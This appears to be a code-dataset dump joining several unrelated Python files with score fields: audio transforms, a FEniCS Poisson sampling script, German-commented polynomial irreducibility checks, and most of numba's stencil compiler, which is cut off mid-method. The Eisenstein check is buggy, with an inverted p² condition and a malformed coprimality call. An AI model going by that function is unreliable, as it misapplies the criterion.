transformed = dict(inputs)
if (inputs["audio"].size / inputs["sr"]) > self.max_length:
max_length = self.max_length * inputs["sr"]
start = np.random.randint(0, inputs["audio"].size - max_length)
transformed["audio"] = inputs["audio"][start:start+max_length]
return transformed
class OneOf:
def __init__(self, transforms):
self.transforms = transforms
def __call__(self, dataset, **inputs):
transform = random.choice(self.transforms)
return transform(**inputs)
class DropFields:
def __init__(self, fields):
self.to_drop = fields
def __call__(self, dataset, **inputs):
transformed = dict()
for name, input in inputs.items():
if not name in self.to_drop:
transformed[name] = input
return transformed
class RenameFields:
def __init__(self, mapping):
self.mapping = mapping
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
for old, new in self.mapping.items():
transformed[new] = transformed.pop(old)
return transformed
class Compose:
def __init__(self, transforms):
self.transforms = transforms
def switch_off_augmentations(self):
for t in self.transforms:
if isinstance(t, Augmentation):
t.p = 0.0
def __call__(self, dataset=None, **inputs):
for t in self.transforms:
inputs = t(dataset=dataset, **inputs)
return inputs
class Identity:
def __call__(self, dataset=None, **inputs):
return inputs | 2.421875 | 2 |
figures/pp.py | mathematicalmichael/thesis | 6 | 4957 | #!/usr/env/bin python
import os
# os.environ['OMP_NUM_THREADS'] = '1'
from newpoisson import poisson
import numpy as np
from fenics import set_log_level, File, RectangleMesh, Point
mesh = RectangleMesh(Point(0,0), Point(1,1), 36, 36)
# comm = mesh.mpi_comm()
set_log_level(40) # ERROR=40
# from mpi4py import MPI
# comm = MPI.COMM_WORLD
# rank = comm.Get_rank()
if __name__=='__main__':
import argparse
parser = argparse.ArgumentParser(description="Poisson Problem")
parser.add_argument('-n', '--num', default = 10, type=int,
help="Number of samples")
parser.add_argument('-o', '--outfile', default='results',
help="Output filename (no extension)")
parser.add_argument('-i', '--input-dim', default=1, type=int)
parser.add_argument('-d', '--dist', default='u', help='Distribution. `n` (normal), `u` (uniform, default)')
args = parser.parse_args()
num_samples = args.num
dist = args.dist
outfile = args.outfile.replace('.pkl','')
inputdim = args.input_dim
if inputdim == 1: # U[1,5]
randsamples = 1 + 4*np.random.rand(num_samples)
else: # N(0,1)
if dist == 'n':
randsamples = np.random.randn(num_samples, inputdim)
elif dist == 'u':
randsamples = -4*np.random.rand(num_samples, inputdim)
else:
raise ValueError("Improper distribution choice, use `n` (normal), `u` (uniform)")
sample_seed_list = list(zip(range(num_samples), randsamples))
def wrapper(sample, outfile):
g=sample[1]
u = poisson(gamma=g, mesh=mesh)
# Save solution
fname = f"{outfile}-data/poisson-{int(sample[0]):06d}.xml"
File(fname, 'w') << u
return {int(sample[0]): {'u': fname, 'gamma': sample[1]}}
results = []
for sample in sample_seed_list:
r = wrapper(sample, outfile)
results.append(r)
# print(results)
import pickle
pickle.dump(results, open(f'{outfile}.pkl','wb'))
| 2.4375 | 2 |
additions/irreducible_check.py | kluhan/seraphim | 0 | 4958 | """
Irreduzibilitätskriterien
Implementiert wurden das Eisenstein- und das Perronkriterium
Quellen:
https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
Übergeben werden Polynome vom Typ Polynomial, keine direkten Listen von Koeffizienten
"""
import logging
import helper
import itertools
def factor(n):
# Faktorisierung einer Zahl n
i = 0
factors = []
for i in range(1, n + 1):
if n % i == 0:
factors.append(i)
return factors
def prime_factor(n):
# Primfaktorzerlegung einer Zahl n
i = 2
factors = []
while i * i <= n:
if n % i:
i += 1
else:
n //= i
factors.append(i)
if n > 1:
factors.append(n)
return factors
# rekursive Implementierung von HCF
def hcf(x, y):
"""Highest common factor"""
if y == 0:
return x
else:
return hcf(y, x % y)
def is_polynomial_coprime(polynomial):
"""Überprüft, ob ein Polynom teilerfremd (coprime) ist"""
non_zero_polynomial = [
i for i in polynomial.coefficients if i != 0
] # Nullen würden Ergebnis von HCF verfälschen
if polynomial.degree() == 0:
return True
for x, y in itertools.combinations(non_zero_polynomial, 2):
if hcf(x, y) != 1:
return False
return True
# Quelle: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
def is_irreducible_perron(polynomial):
"""
Prüft ein Polynom auf Irreduzierbarkeit (Perron).
Führender Koeffizient != 1 funktioniert nicht.
Keine Aussage möglich, wenn vorletzer Koeffizient kleiner ist als die absolute Summe der restlichen Koeffizienten
"""
if polynomial.degree() < 0:
return logging.error("Polynom ungültig")
const_coefficient = polynomial.coefficients[0]
if const_coefficient == 0:
return 0
lead_coefficient = polynomial.coefficients[polynomial.degree()]
assert lead_coefficient == 1
nm1_coefficient = abs(polynomial.coefficients[polynomial.degree() - 1])
total = 1
i = 0
for coeff in polynomial.coefficients:
if i < polynomial.degree() - 1:
total += abs(coeff)
i = i + 1
if nm1_coefficient > total:
return 1
return 2
# Quellen: https://www.uni-frankfurt.de/81429607/Stix_Algebra_SkriptWS2016_17.pdf
# http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
def is_irreducible_eisenstein(polynomial):
"""
Eine Implementierung des Eisensteinkriteriums.
"""
# Polynom muss einen Grad m >= 1 haben
if polynomial.degree() < 1:
return 2
# Voraussetzung für Eisenstein sind teilerfremde Koeffizienten
if helper.is_polynomial_coprime(polynomial is False):
return 2
# Prüfe, ob es eine Primzahl gibt, die alle Koeffizienten des Polynoms bis Grad m - 1 teilt. p^2 darf a0 nicht teilen
const_coeff = polynomial.coefficients[0]
if const_coeff == 0:
return 0
# Erhalte Primfaktorzerlegung der Konstante, um Grundlage von Primzahlen zu erhalten
prime_factors = helper.prime_factor(const_coeff)
for p in prime_factors:
if (
const_coeff % pow(p, 2) != 0
): # teilt p^2 den konstanten Koeffizienten, dann kann keine Aussage getroffen werden
return 2
for coeff in polynomial.coefficients[0 : polynomial.degree() - 1]:
if coeff % p != 0:
return 2 # teilt die Primzahl den Koeffizienten nicht, kann keine Aussage getroffen werden
return 1
| 2.890625 | 3 |
numba/stencils/stencil.py | auderson/numba | 6,620 | 4959 | <reponame>auderson/numba<filename>numba/stencils/stencil.py<gh_stars>1000+
#
# Copyright (c) 2017 Intel Corporation
# SPDX-License-Identifier: BSD-2-Clause
#
import copy
import numpy as np
from llvmlite import ir as lir
from numba.core import types, typing, utils, ir, config, ir_utils, registry
from numba.core.typing.templates import (CallableTemplate, signature,
infer_global, AbstractTemplate)
from numba.core.imputils import lower_builtin
from numba.core.extending import register_jitable
from numba.core.errors import NumbaValueError
from numba.misc.special import literal_unroll
import numba
import operator
from numba.np import numpy_support
class StencilFuncLowerer(object):
'''Callable class responsible for lowering calls to a specific StencilFunc.
'''
def __init__(self, sf):
self.stencilFunc = sf
def __call__(self, context, builder, sig, args):
cres = self.stencilFunc.compile_for_argtys(sig.args, {},
sig.return_type, None)
res = context.call_internal(builder, cres.fndesc, sig, args)
context.add_linking_libs([cres.library])
return res
@register_jitable
def raise_if_incompatible_array_sizes(a, *args):
ashape = a.shape
# We need literal_unroll here because the stencil might take
# multiple input arrays with different types that are not compatible
# (e.g. values as float[:] and flags as bool[:])
# When more than three total arrays are given, the second and third
# are iterated over in the loop below. Without literal_unroll, their
# types have to match.
# An example failing signature without literal_unroll might be
# (float[:], float[:], bool[:]) (Just (float[:], bool[:]) wouldn't fail)
for arg in literal_unroll(args):
if a.ndim != arg.ndim:
raise ValueError("Secondary stencil array does not have same number "
" of dimensions as the first stencil input.")
argshape = arg.shape
for i in range(len(ashape)):
if ashape[i] > argshape[i]:
raise ValueError("Secondary stencil array has some dimension "
"smaller the same dimension in the first "
"stencil input.")
def slice_addition(the_slice, addend):
""" Called by stencil in Python mode to add the loop index to a
user-specified slice.
"""
return slice(the_slice.start + addend, the_slice.stop + addend)
class StencilFunc(object):
"""
A special type to hold stencil information for the IR.
"""
id_counter = 0
def __init__(self, kernel_ir, mode, options):
self.id = type(self).id_counter
type(self).id_counter += 1
self.kernel_ir = kernel_ir
self.mode = mode
self.options = options
self.kws = [] # remember original kws arguments
# stencils only supported for CPU context currently
self._typingctx = registry.cpu_target.typing_context
self._targetctx = registry.cpu_target.target_context
self._typingctx.refresh()
self._targetctx.refresh()
self._install_type(self._typingctx)
self.neighborhood = self.options.get("neighborhood")
self._type_cache = {}
self._lower_me = StencilFuncLowerer(self)
def replace_return_with_setitem(self, blocks, index_vars, out_name):
"""
Find return statements in the IR and replace them with a SetItem
call of the value "returned" by the kernel into the result array.
Returns the block labels that contained return statements.
"""
ret_blocks = []
for label, block in blocks.items():
scope = block.scope
loc = block.loc
new_body = []
for stmt in block.body:
if isinstance(stmt, ir.Return):
ret_blocks.append(label)
# If 1D array then avoid the tuple construction.
if len(index_vars) == 1:
rvar = ir.Var(scope, out_name, loc)
ivar = ir.Var(scope, index_vars[0], loc)
new_body.append(ir.SetItem(rvar, ivar, stmt.value, loc))
else:
# Convert the string names of the index variables into
# ir.Var's.
var_index_vars = []
for one_var in index_vars:
index_var = ir.Var(scope, one_var, loc)
var_index_vars += [index_var]
s_index_name = ir_utils.mk_unique_var("stencil_index")
s_index_var = ir.Var(scope, s_index_name, loc)
# Build a tuple from the index ir.Var's.
tuple_call = ir.Expr.build_tuple(var_index_vars, loc)
new_body.append(ir.Assign(tuple_call, s_index_var, loc))
rvar = ir.Var(scope, out_name, loc)
# Write the return statements original value into
# the array using the tuple index.
si = ir.SetItem(rvar, s_index_var, stmt.value, loc)
new_body.append(si)
else:
new_body.append(stmt)
block.body = new_body
return ret_blocks
def add_indices_to_kernel(self, kernel, index_names, ndim,
neighborhood, standard_indexed, typemap, calltypes):
"""
Transforms the stencil kernel as specified by the user into one
that includes each dimension's index variable as part of the getitem
calls. So, in effect array[-1] becomes array[index0-1].
"""
const_dict = {}
kernel_consts = []
if config.DEBUG_ARRAY_OPT >= 1:
print("add_indices_to_kernel", ndim, neighborhood)
ir_utils.dump_blocks(kernel.blocks)
if neighborhood is None:
need_to_calc_kernel = True
else:
need_to_calc_kernel = False
if len(neighborhood) != ndim:
raise ValueError("%d dimensional neighborhood specified for %d " \
"dimensional input array" % (len(neighborhood), ndim))
tuple_table = ir_utils.get_tuple_table(kernel.blocks)
relatively_indexed = set()
for block in kernel.blocks.values():
scope = block.scope
loc = block.loc
new_body = []
for stmt in block.body:
if (isinstance(stmt, ir.Assign) and
isinstance(stmt.value, ir.Const)):
if config.DEBUG_ARRAY_OPT >= 1:
print("remembering in const_dict", stmt.target.name,
stmt.value.value)
# Remember consts for use later.
const_dict[stmt.target.name] = stmt.value.value
if ((isinstance(stmt, ir.Assign)
and isinstance(stmt.value, ir.Expr)
and stmt.value.op in ['setitem', 'static_setitem']
and stmt.value.value.name in kernel.arg_names) or
(isinstance(stmt, ir.SetItem)
and stmt.target.name in kernel.arg_names)):
raise ValueError("Assignments to arrays passed to stencil " \
"kernels is not allowed.")
if (isinstance(stmt, ir.Assign)
and isinstance(stmt.value, ir.Expr)
and stmt.value.op in ['getitem', 'static_getitem']
and stmt.value.value.name in kernel.arg_names
and stmt.value.value.name not in standard_indexed):
# We found a getitem from the input array.
if stmt.value.op == 'getitem':
stmt_index_var = stmt.value.index
else:
stmt_index_var = stmt.value.index_var
# allow static_getitem since rewrite passes are applied
#raise ValueError("Unexpected static_getitem in add_indices_to_kernel.")
relatively_indexed.add(stmt.value.value.name)
# Store the index used after looking up the variable in
# the const dictionary.
if need_to_calc_kernel:
assert hasattr(stmt_index_var, 'name')
if stmt_index_var.name in tuple_table:
kernel_consts += [tuple_table[stmt_index_var.name]]
elif stmt_index_var.name in const_dict:
kernel_consts += [const_dict[stmt_index_var.name]]
else:
raise NumbaValueError("stencil kernel index is not "
"constant, 'neighborhood' option required")
if ndim == 1:
# Single dimension always has index variable 'index0'.
# tmpvar will hold the real index and is computed by
# adding the relative offset in stmt.value.index to
# the current absolute location in index0.
index_var = ir.Var(scope, index_names[0], loc)
tmpname = ir_utils.mk_unique_var("stencil_index")
tmpvar = ir.Var(scope, tmpname, loc)
stmt_index_var_typ = typemap[stmt_index_var.name]
# If the array is indexed with a slice then we
# have to add the index value with a call to
# slice_addition.
if isinstance(stmt_index_var_typ, types.misc.SliceType):
sa_var = ir.Var(scope, ir_utils.mk_unique_var("slice_addition"), loc)
sa_func = numba.njit(slice_addition)
sa_func_typ = types.functions.Dispatcher(sa_func)
typemap[sa_var.name] = sa_func_typ
g_sa = ir.Global("slice_addition", sa_func, loc)
new_body.append(ir.Assign(g_sa, sa_var, loc))
slice_addition_call = ir.Expr.call(sa_var, [stmt_index_var, index_var], (), loc)
calltypes[slice_addition_call] = sa_func_typ.get_call_type(self._typingctx, [stmt_index_var_typ, types.intp], {})
new_body.append(ir.Assign(slice_addition_call, tmpvar, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value, tmpvar, loc),
stmt.target, loc))
else:
acc_call = ir.Expr.binop(operator.add, stmt_index_var,
index_var, loc)
new_body.append(ir.Assign(acc_call, tmpvar, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value, tmpvar, loc),
stmt.target, loc))
else:
index_vars = []
sum_results = []
s_index_name = ir_utils.mk_unique_var("stencil_index")
s_index_var = ir.Var(scope, s_index_name, loc)
const_index_vars = []
ind_stencils = []
stmt_index_var_typ = typemap[stmt_index_var.name]
# Same idea as above but you have to extract
# individual elements out of the tuple indexing
# expression and add the corresponding index variable
# to them and then reconstitute as a tuple that can
# index the array.
for dim in range(ndim):
tmpname = ir_utils.mk_unique_var("const_index")
tmpvar = ir.Var(scope, tmpname, loc)
new_body.append(ir.Assign(ir.Const(dim, loc),
tmpvar, loc))
const_index_vars += [tmpvar]
index_var = ir.Var(scope, index_names[dim], loc)
index_vars += [index_var]
tmpname = ir_utils.mk_unique_var("ind_stencil_index")
tmpvar = ir.Var(scope, tmpname, loc)
ind_stencils += [tmpvar]
getitemname = ir_utils.mk_unique_var("getitem")
getitemvar = ir.Var(scope, getitemname, loc)
getitemcall = ir.Expr.getitem(stmt_index_var,
const_index_vars[dim], loc)
new_body.append(ir.Assign(getitemcall, getitemvar, loc))
# Get the type of this particular part of the index tuple.
if isinstance(stmt_index_var_typ, types.ConstSized):
one_index_typ = stmt_index_var_typ[dim]
else:
one_index_typ = stmt_index_var_typ[:]
# If the array is indexed with a slice then we
# have to add the index value with a call to
# slice_addition.
if isinstance(one_index_typ, types.misc.SliceType):
sa_var = ir.Var(scope, ir_utils.mk_unique_var("slice_addition"), loc)
sa_func = numba.njit(slice_addition)
sa_func_typ = types.functions.Dispatcher(sa_func)
typemap[sa_var.name] = sa_func_typ
g_sa = ir.Global("slice_addition", sa_func, loc)
new_body.append(ir.Assign(g_sa, sa_var, loc))
slice_addition_call = ir.Expr.call(sa_var, [getitemvar, index_vars[dim]], (), loc)
calltypes[slice_addition_call] = sa_func_typ.get_call_type(self._typingctx, [one_index_typ, types.intp], {})
new_body.append(ir.Assign(slice_addition_call, tmpvar, loc))
else:
acc_call = ir.Expr.binop(operator.add, getitemvar,
index_vars[dim], loc)
new_body.append(ir.Assign(acc_call, tmpvar, loc))
tuple_call = ir.Expr.build_tuple(ind_stencils, loc)
new_body.append(ir.Assign(tuple_call, s_index_var, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value,s_index_var,loc),
stmt.target,loc))
else:
new_body.append(stmt)
block.body = new_body
if need_to_calc_kernel:
# Find the size of the kernel by finding the maximum absolute value
# index used in the kernel specification.
neighborhood = [[0,0] for _ in range(ndim)]
if len(kernel_consts) == 0:
raise NumbaValueError("Stencil kernel with no accesses to "
"relatively indexed arrays.")
for index in kernel_consts:
if isinstance(index, tuple) or isinstance(index, list):
for i in range(len(index)):
te = index[i]
if isinstance(te, ir.Var) and te.name in const_dict:
te = const_dict[te.name]
if isinstance(te, int):
neighborhood[i][0] = min(neighborhood[i][0], te)
neighborhood[i][1] = max(neighborhood[i][1], te)
else:
raise NumbaValueError(
"stencil kernel index is not constant,"
"'neighborhood' option required")
index_len = len(index)
elif isinstance(index, int):
neighborhood[0][0] = min(neighborhood[0][0], index)
neighborhood[0][1] = max(neighborhood[0][1], index)
index_len = 1
else:
raise NumbaValueError(
"Non-tuple or non-integer used as stencil index.")
if index_len != ndim:
raise NumbaValueError(
"Stencil index does not match array dimensionality.")
return (neighborhood, relatively_indexed)
def get_return_type(self, argtys):
if config.DEBUG_ARRAY_OPT >= 1:
print("get_return_type", argtys)
ir_utils.dump_blocks(self.kernel_ir.blocks)
if not isinstance(argtys[0], types.npytypes.Array):
raise NumbaValueError("The first argument to a stencil kernel must "
"be the primary input array.")
from numba.core import typed_passes
typemap, return_type, calltypes, _ = typed_passes.type_inference_stage(
self._typingctx,
self._targetctx,
self.kernel_ir,
argtys,
None,
{})
if isinstance(return_type, types.npytypes.Array):
raise NumbaValueError(
"Stencil kernel must return a scalar and not a numpy array.")
real_ret = types.npytypes.Array(return_type, argtys[0].ndim,
argtys[0].layout)
return (real_ret, typemap, calltypes)
def _install_type(self, typingctx):
"""Constructs and installs a typing class for a StencilFunc object in
the input typing context.
"""
_ty_cls = type('StencilFuncTyping_' +
str(self.id),
(AbstractTemplate,),
dict(key=self, generic=self._type_me))
typingctx.insert_user_function(self, _ty_cls)
def compile_for_argtys(self, argtys, kwtys, return_type, sigret):
# look in the type cache to find if result array is passed
(_, result, typemap, calltypes) = self._type_cache[argtys]
new_func = self._stencil_wrapper(result, sigret, return_type,
typemap, calltypes, *argtys)
return new_func
def _type_me(self, argtys, kwtys):
"""
Implement AbstractTemplate.generic() for the typing class
built by StencilFunc._install_type().
Return the call-site signature.
"""
if (self.neighborhood is not None and
len(self.neighborhood) != argtys[0].ndim):
raise NumbaValueError("%d dimensional neighborhood specified "
"for %d dimensional input array" %
(len(self.neighborhood), argtys[0].ndim))
argtys_extra = argtys
sig_extra = ""
result = None
if 'out' in kwtys:
argtys_extra += (kwtys['out'],)
sig_extra += ", out=None"
result = kwtys['out']
if 'neighborhood' in kwtys:
argtys_extra += (kwtys['neighborhood'],)
sig_extra += ", neighborhood=None"
# look in the type cache first
if argtys_extra in self._type_cache:
(_sig, _, _, _) = self._type_cache[argtys_extra]
return _sig
(real_ret, typemap, calltypes) = self.get_return_type(argtys)
sig = signature(real_ret, *argtys_extra)
dummy_text = ("def __numba_dummy_stencil({}{}):\n pass\n".format(
",".join(self.kernel_ir.arg_names), sig_extra))
exec(dummy_text) in globals(), locals()
dummy_func = eval("__numba_dummy_stencil")
sig = sig.replace(pysig=utils.pysignature(dummy_func))
self._targetctx.insert_func_defn([(self._lower_me, self, argtys_extra)])
self._type_cache[argtys_extra] = (sig, result, typemap, calltypes)
return sig
def copy_ir_with_calltypes(self, ir, calltypes):
"""
Create a copy of a given IR along with its calltype information.
We need a copy of the calltypes because copy propagation applied
to the copied IR will change the calltypes and make subsequent
uses of the original IR invalid.
"""
copy_calltypes = {}
kernel_copy = ir.copy()
kernel_copy.blocks = {}
# For each block...
for (block_label, block) in ir.blocks.items():
new_block = copy.deepcopy(ir.blocks[block_label])
new_block.body = []
# For each statement in each block...
for stmt in ir.blocks[block_label].body:
# Copy the statement to the new copy of the kernel
# and if the original statement is in the original
# calltypes then add the type associated with this
# statement to the calltypes copy.
scopy = copy.deepcopy(stmt)
new_block.body.append(scopy)
if stmt in calltypes:
copy_calltypes[scopy] = calltypes[stmt]
kernel_copy.blocks[block_label] = new_block
return (kernel_copy, copy_calltypes)
def _stencil_wrapper(self, result, sigret, return_type, typemap, calltypes, *args):
# Overall approach:
# 1) Construct a string containing a function definition for the stencil function
# that will execute the stencil kernel. This function definition includes a
# unique stencil function name, the parameters to the stencil kernel, loop
# nests across the dimensions of the input array. Those loop nests use the
# computed stencil kernel size so as not to try to compute elements where
# elements outside the bounds of the input array would be needed.
# 2) The but of the loop nest in this new function is a special sentinel
# assignment.
# 3) Get the IR of this new function.
# 4) Split the block containing the sentinel assignment and remove the sentinel
# assignment. Insert the stencil kernel IR into the stencil function IR
# after label and variable renaming of the stencil kernel IR to prevent
# conflicts with the stencil function IR.
# 5) Compile the combined stencil function IR + stencil kernel IR into existence.
# Copy the kernel so that our changes for this callsite
# won't effect other callsites.
(kernel_copy, copy_calltypes) = self.copy_ir_with_calltypes(
self.kernel_ir, calltypes)
# The stencil kernel body becomes the body of a loop, for which args aren't needed.
ir_utils.remove_args(kernel_copy.blocks)
first_arg = kernel_copy.arg_names[0]
in_cps, out_cps = ir_utils.copy_propagate(kernel_copy.blocks, typemap)
name_var_table = ir_utils.get_name_var_table(kernel_copy.blocks)
ir_utils.apply_copy_propagate(
kernel_copy.blocks,
in_cps,
name_var_table,
typemap,
copy_calltypes)
if "out" in name_var_table:
raise NumbaValueError("Cannot use the reserved word 'out' in stencil kernels.")
sentinel_name = ir_utils.get_unused_var_name("__sentinel__", name_var_table)
if config.DEBUG_ARRAY_OPT >= 1:
print("name_var_table", name_var_table, sentinel_name)
the_array = args[0]
if config.DEBUG_ARRAY_OPT >= 1:
print("_stencil_wrapper", return_type, return_type.dtype,
type(return_type.dtype), args)
ir_utils.dump_blocks(kernel_copy.blocks)
# We generate a Numba function to execute this stencil and here
# create the unique name of this function.
stencil_func_name = "__numba_stencil_%s_%s" % (
hex(id(the_array)).replace("-", "_"),
self.id)
# We will put a loop nest in the generated function for each
# dimension in the input array. Here we create the name for
# the index variable for each dimension. index0, index1, ...
index_vars = []
for i in range(the_array.ndim):
index_var_name = ir_utils.get_unused_var_name("index" + str(i),
name_var_table)
index_vars += [index_var_name]
# Create extra signature for out and neighborhood.
out_name = ir_utils.get_unused_var_name("out", name_var_table)
neighborhood_name = ir_utils.get_unused_var_name("neighborhood",
name_var_table)
sig_extra = ""
if result is not None:
sig_extra += ", {}=None".format(out_name)
if "neighborhood" in dict(self.kws):
sig_extra += ", {}=None".format(neighborhood_name)
# Get a list of the standard indexed array names.
standard_indexed = self.options.get("standard_indexing", [])
if first_arg in standard_indexed:
raise NumbaValueError("The first argument to a stencil kernel must "
"use relative indexing, not standard indexing.")
if len(set(standard_indexed) - set(kernel_copy.arg_names)) != 0:
raise NumbaValueError("Standard indexing requested for an array name "
"not present in the stencil kernel definition.")
# Add index variables to getitems in the IR to transition the accesses
# in the kernel from relative to regular Python indexing. Returns the
# computed size of the stencil kernel and a list of the relatively indexed
# arrays.
kernel_size, relatively_indexed = self.add_indices_to_kernel(
kernel_copy, index_vars, the_array.ndim,
self.neighborhood, standard_indexed, typemap, copy_calltypes)
if self.neighborhood is None:
self.neighborhood = kernel_size
if config.DEBUG_ARRAY_OPT >= 1:
print("After add_indices_to_kernel")
ir_utils.dump_blocks(kernel_copy.blocks)
# The return in the stencil kernel becomes a setitem for that
# particular point in the iteration space.
ret_blocks = self.replace_return_with_setitem(kernel_copy.blocks,
index_vars, out_name)
if config.DEBUG_ARRAY_OPT >= 1:
print("After replace_return_with_setitem", ret_blocks)
ir_utils.dump_blocks(kernel_copy.blocks)
# Start to form the new function to execute the stencil kernel.
func_text = "def {}({}{}):\n".format(stencil_func_name,
",".join(kernel_copy.arg_names), sig_extra)
# Get loop ranges for each dimension, which could be either int
# or variable. In the latter case we'll use the extra neighborhood
# argument to the function.
ranges = []
for i in range(the_array.ndim):
if isinstance(kernel_size[i][0], int):
lo = kernel_size[i][0]
hi = kernel_size[i][1]
else:
lo = "{}[{}][0]".format(neighborhood_name, i)
hi = "{}[{}][1]".format(neighborhood_name, i)
ranges.append((lo, hi))
# If there are more than one relatively indexed arrays, add a call to
# a function that will raise an error if any of the relatively indexed
# arrays are of different size than the first input array.
if len(relatively_indexed) > 1:
func_text += " raise_if_incompatible_array_sizes(" + first_arg
for other_array in relatively_indexed:
if other_array != first_arg:
func_text += "," + other_array
func_text += ")\n"
# Get the shape of the first input array.
shape_name = ir_utils.get_unused_var_name("full_shape", name_var_table)
func_text += " {} = {}.shape\n".format(shape_name, first_arg)
# Converts cval to a string constant
def cval_as_str(cval):
if not np.isfinite(cval):
# See if this is a string-repr numerical const, issue #7286
if np.isnan(cval):
return "np.nan"
elif np.isinf(cval):
if cval < 0:
return "-np.inf"
else:
return "np.inf"
else:
return str(cval)
# If we have to allocate the output array (the out argument was not used)
# then us numpy.full if the user specified a cval stencil decorator option
# or np.zeros if they didn't to allocate the array.
if result is None:
return_type_name = numpy_support.as_dtype(
return_type.dtype).type.__name__
if "cval" in self.options:
cval = self.options["cval"]
if return_type.dtype != typing.typeof.typeof(cval):
msg = "cval type does not match stencil return type."
raise NumbaValueError(msg)
out_init ="{} = np.full({}, {}, dtype=np.{})\n".format(
out_name, shape_name, cval_as_str(cval),
return_type_name)
else:
out_init ="{} = np.zeros({}, dtype=np.{})\n".format(
out_name, shape_name, return_type_name)
func_text += " " + out_init
else: # result is present, if cval is set then use it
if "cval" in self.options:
cval = self.options["cval"]
cval_ty = typing.typeof.typeof(cval)
if not self._typingctx.can_convert(cval_ty, return_type.dtype):
msg = "cval type does not match stencil return type."
raise NumbaValueError(msg)
out_init = "{}[:] = {}\n".format(out_name, cval_as_str(cval))
func_text += " " + out_init
offset = 1
# Add the loop nests to the new function.
for i in range(the_array.ndim):
for j in range(offset):
func_text += " "
# ranges[i][0] is the minimum index used in the i'th dimension
# but minimum's greater than 0 don't preclude any entry in the array.
# So, take the minimum of 0 and the minimum index found in the kernel
# and this will be a negative number (potentially -0). Then, we do
# unary - on that to get the positive offset in this dimension whose
# use is precluded.
# ranges[i][1] is the maximum of 0 and the observed maximum index
# in this dimension because negative maximums would not cause us to
# preclude any entry in the array from being used.
func_text += ("for {} in range(-min(0,{}),"
"{}[{}]-max(0,{})):\n").format(
index_vars[i],
ranges[i][0],
shape_name,
i,
ranges[i][1])
offset += 1
for j in range(offset):
func_text += " "
# Put a sentinel in the code so we can locate it in the IR. We will
# remove this sentinel assignment and replace it with the IR for the
# stencil kernel body.
func_text += "{} = 0\n".format(sentinel_name)
func_text += " return {}\n".format(out_name)
if config.DEBUG_ARRAY_OPT >= 1:
print("new stencil func text")
print(func_text)
# Force the new stencil function into existence.
exec(func_text) in globals(), locals()
stencil_func = eval(stencil_func_name)
if sigret is not None:
pysig = utils.pysignature(stencil_func)
sigret.pysig = pysig
# Get the IR for the newly created stencil function.
from numba.core import compiler
stencil_ir = compiler.run_frontend(stencil_func)
ir_utils.remove_dels(stencil_ir.blocks)
# rename all variables in stencil_ir afresh
var_table = ir_utils.get_name_var_table(stencil_ir.blocks)
new_var_dict = {}
reserved_names = ([sentinel_name, out_name, neighborhood_name,
shape_name] + kernel_copy.arg_names + index_vars)
for name, var in var_table.items():
if not name in reserved_names:
new_var_dict[name] = ir_utils.mk_unique_var(name)
ir_utils.replace_var_names(stencil_ir.blocks, new_var_dict)
stencil_stub_last_label = max(stencil_ir.blocks.keys()) + 1
# Shift labels in the kernel copy so they are guaranteed unique
# and don't conflict with any labels in the stencil_ir.
kernel_copy.blocks = ir_utils.add_offset_to_labels(
kernel_copy.blocks, stencil_stub_last_label)
new_label = max(kernel_copy.blocks.keys()) + 1
# Adjust ret_blocks to account for addition of the offset.
ret_blocks = [x + stencil_stub_last_label for x in ret_blocks]
if config.DEBUG_ARRAY_OPT >= 1:
print("ret_blocks w/ offsets", ret_blocks, stencil_stub_last_label)
print("before replace sentinel stencil_ir")
ir_utils.dump_blocks(stencil_ir.blocks)
print("before replace sentinel kernel_copy")
ir_utils.dump_blocks(kernel_copy.blocks)
# Search all the block in the stencil outline for the sentinel.
for label, block in stencil_ir.blocks.items():
for i, inst in enumerate(block.body):
if (isinstance( inst, ir.Assign) and
inst.target.name == sentinel_name):
# We found the sentinel assignment.
loc = inst.loc
scope = block.scope
# split block across __sentinel__
# A new block is allocated for the statements prior to the
# sentinel but the new block maintains the current block
# label.
prev_block = ir.Block(scope, loc)
prev_block.body = block.body[:i]
# The current block is used for statements after sentinel.
block.body = block.body[i + 1:]
# But the current block gets a new label.
body_first_label = min(kernel_copy.blocks.keys())
# The previous block jumps to the minimum labelled block of
# the parfor body.
prev_block.append(ir.Jump(body_first_label, loc))
# Add all the parfor loop body blocks to the gufunc
# function's IR.
for (l, b) in kernel_copy.blocks.items():
stencil_ir.blocks[l] = b
stencil_ir.blocks[new_label] = block
stencil_ir.blocks[label] = prev_block
# Add a jump from all the blocks that previously contained
# a return in the stencil kernel to the block
# containing statements after the sentinel.
for ret_block in ret_blocks:
stencil_ir.blocks[ret_block].append(
ir.Jump(new_label, loc))
break
else:
continue
break
stencil_ir.blocks = ir_utils.rename_labels(stencil_ir.blocks)
ir_utils.remove_dels(stencil_ir.blocks)
assert(isinstance(the_array, types.Type))
array_types = args
new_stencil_param_types = list(array_types)
if config.DEBUG_ARRAY_OPT >= 1:
print("new_stencil_param_types", new_stencil_param_types)
ir_utils.dump_blocks(stencil_ir.blocks)
# Compile the combined stencil function with the replaced loop
# body in it.
ir_utils.fixup_var_define_in_scope(stencil_ir.blocks)
new_func = compiler.compile_ir(
self._typingctx,
self._targetctx,
stencil_ir,
new_stencil_param_types,
None,
compiler.DEFAULT_FLAGS,
{})
return new_func
def __call__(self, *args, **kwargs):
if (self.neighborhood is not None and
len(self.neighborhood) != args[0].ndim):
raise ValueError("{} dimensional neighborhood specified for {} "
"dimensional input array".format(
len(self.neighborhood), args[0].ndim))
if 'out' in kwargs:
result = kwargs['out']
rdtype = result.dtype
rttype = numpy_support.from_dtype(rdtype)
result_type = types.npytypes.Array(rttype, result.ndim,
numpy_support.map_layout(result))
array_types = tuple([typing.typeof.typeof(x) for x in args])
array_types_full = tuple([typing.typeof.typeof(x) for x in args] +
[result_type])
else:
result = None
array_types = tuple([typing.typeof.typeof(x) for x in args])
array_types_full = array_types
if config.DEBUG_ARRAY_OPT >= 1:
print("__call__", array_types, args, kwargs)
(real_ret, typemap, calltypes) = self.get_return_type(array_types)
new_func = self._stencil_wrapper(result, None, real_ret, typemap,
calltypes, *array_types_full)
if result is None:
